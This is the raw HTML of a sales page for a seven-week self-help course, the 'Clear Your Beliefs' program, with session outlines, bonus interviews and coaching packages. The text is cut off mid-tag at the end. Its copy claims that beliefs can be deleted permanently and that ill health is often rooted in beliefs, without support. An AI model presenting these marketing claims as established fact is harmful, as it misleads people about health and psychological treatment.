mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center;">OR</p>\n<p><a 